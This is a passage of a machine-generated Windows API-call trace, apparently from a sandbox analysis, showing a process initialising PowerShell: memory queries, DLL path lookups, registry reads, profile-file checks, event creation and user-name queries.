dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.221] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.221] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.222] VirtualQuery (in: lpAddress=0x1ab4b0, lpBuffer=0x1ac370, dwLength=0x30 | out: lpBuffer=0x1ac370*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.223] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.223] CoTaskMemFree (pv=0x1b7404f0) [0105.225] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.225] CoTaskMemFree (pv=0x1b7404f0) [0105.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.243] VirtualQuery (in: lpAddress=0x1ab760, lpBuffer=0x1ac620, dwLength=0x30 | out: lpBuffer=0x1ac620*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0105.244] VirtualQuery (in: lpAddress=0x1ab760, lpBuffer=0x1ac620, dwLength=0x30 | out: lpBuffer=0x1ac620*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.244] VirtualQuery (in: lpAddress=0x1aafb0, lpBuffer=0x1abe70, dwLength=0x30 | out: lpBuffer=0x1abe70*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.245] VirtualQuery (in: lpAddress=0x1aafb0, lpBuffer=0x1abe70, dwLength=0x30 | out: lpBuffer=0x1abe70*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0105.246] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad5b8 | out: phkResult=0x1ad5b8*=0x304) returned 0x0 [0105.246] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad53c, lpData=0x0, lpcbData=0x1ad538*=0x0 | out: lpType=0x1ad53c*=0x1, lpData=0x0, lpcbData=0x1ad538*=0x56) returned 0x0 [0105.246] CoTaskMemAlloc (cb=0x5a) returned 0x2d95d0 [0105.246] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad50c, lpData=0x2d95d0, lpcbData=0x1ad508*=0x56 | out: lpType=0x1ad50c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad508*=0x56) returned 0x0 [0105.246] CoTaskMemFree (pv=0x2d95d0) [0105.247] RegCloseKey (hKey=0x304) returned 0x0 [0105.247] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad5b8 | out: phkResult=0x1ad5b8*=0x304) returned 0x0 [0105.247] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad53c, lpData=0x0, lpcbData=0x1ad538*=0x0 | out: lpType=0x1ad53c*=0x1, lpData=0x0, lpcbData=0x1ad538*=0x56) returned 0x0 [0105.247] CoTaskMemAlloc (cb=0x5a) returned 0x2d95d0 [0105.247] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad50c, lpData=0x2d95d0, lpcbData=0x1ad508*=0x56 | out: lpType=0x1ad50c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad508*=0x56) returned 0x0 [0105.247] CoTaskMemFree (pv=0x2d95d0) [0105.247] RegCloseKey (hKey=0x304) returned 0x0 [0105.247] CoTaskMemAlloc (cb=0x20c) returned 0x2ec8d0 [0105.247] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ec8d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0105.248] CoTaskMemFree (pv=0x2ec8d0) [0105.248] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0105.248] CoTaskMemAlloc (cb=0x20c) returned 0x2ec8d0 [0105.248] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ec8d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0105.248] CoTaskMemFree (pv=0x2ec8d0) [0105.248] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0105.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0105.250] SetErrorMode (uMode=0x1) returned 0x1 [0105.250] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad520 | out: lpFileInformation=0x1ad520*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0105.251] SetErrorMode (uMode=0x1) returned 0x1 [0105.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0105.251] SetErrorMode (uMode=0x1) returned 0x1 [0105.251] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad520 | out: lpFileInformation=0x1ad520*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0105.251] SetErrorMode (uMode=0x1) returned 0x1 [0105.251] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0105.251] SetErrorMode (uMode=0x1) returned 0x1 [0105.251] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad520 | out: lpFileInformation=0x1ad520*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0105.252] SetErrorMode (uMode=0x1) returned 0x1 [0105.252] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0105.252] SetErrorMode (uMode=0x1) returned 0x1 [0105.252] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad520 | out: lpFileInformation=0x1ad520*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0105.252] SetErrorMode (uMode=0x1) returned 0x1 [0105.254] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.254] CoTaskMemFree (pv=0x1b7404f0) [0105.255] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.255] CoTaskMemFree (pv=0x1b7404f0) [0105.257] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.257] CoTaskMemFree (pv=0x1b7404f0) [0105.259] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.259] CoTaskMemFree (pv=0x1b7404f0) [0105.264] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.264] CoTaskMemFree (pv=0x1b7404f0) [0105.266] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x304 [0105.266] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b4 [0105.266] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358 [0105.266] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0105.266] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384 [0105.266] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x388 [0105.266] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0105.267] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390 [0105.267] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394 [0105.267] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398 [0105.267] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8 [0105.267] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c [0105.269] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.269] CoTaskMemFree (pv=0x1b7404f0) [0105.272] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0105.273] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1ad700 | out: lpMode=0x1ad700) returned 1 [0105.274] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.274] CoTaskMemFree (pv=0x1b7404f0) [0105.277] SetEvent (hEvent=0x380) returned 1 [0105.278] SetEvent (hEvent=0x304) returned 1 [0105.278] SetEvent (hEvent=0x3b4) returned 1 [0105.278] SetEvent (hEvent=0x358) returned 1 [0105.278] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0 [0105.279] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.279] CoTaskMemFree (pv=0x1b7404f0) [0105.280] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad458 | out: phkResult=0x1ad458*=0x3a4) returned 0x0 [0105.280] RegQueryValueExW (in: hKey=0x3a4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ad3dc, lpData=0x0, lpcbData=0x1ad3d8*=0x0 | out: lpType=0x1ad3dc*=0x0, lpData=0x0, lpcbData=0x1ad3d8*=0x0) returned 0x2 [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x33c [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x340 [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344 [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d8 [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x48c [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a4 [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d0 [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e4 [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3e8 [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x454 [0135.758] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f8 [0135.758] SetEvent (hEvent=0x3d8) returned 1 [0135.759] SetEvent (hEvent=0x33c) returned 1 [0135.759] SetEvent (hEvent=0x340) returned 1 [0135.759] SetEvent (hEvent=0x344) returned 1 [0135.759] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0135.759] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad4e8 | out: phkResult=0x1ad4e8*=0x3f0) returned 0x0 [0135.759] RegQueryValueExW (in: hKey=0x3f0, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ad46c, lpData=0x0, lpcbData=0x1ad468*=0x0 | out: lpType=0x1ad46c*=0x0, lpData=0x0, lpcbData=0x1ad468*=0x0) returned 0x2 [0135.784] SetEvent (hEvent=0x48c) returned 1 [0135.784] SetEvent (hEvent=0x3a4) returned 1 [0135.784] SetEvent (hEvent=0x1d0) returned 1 [0135.788] CoTaskMemAlloc (cb=0x104) returned 0x1b740a40 [0135.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b740a40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.788] CoTaskMemFree (pv=0x1b740a40) [0135.790] SetEvent (hEvent=0x324) returned 1 [0135.792] CoTaskMemAlloc (cb=0x804) returned 0x1b775c00 [0135.792] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b775c00, nSize=0x1ad588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad588) returned 0x1 [0135.793] CoTaskMemFree (pv=0x1b775c00) [0135.793] CoTaskMemAlloc (cb=0x204) returned 0x270310 [0135.793] GetUserNameW (in: lpBuffer=0x270310, pcbBuffer=0x1ad5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad5c8) returned 1 [0135.793] CoTaskMemFree (pv=0x270310) [0135.794] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x4, 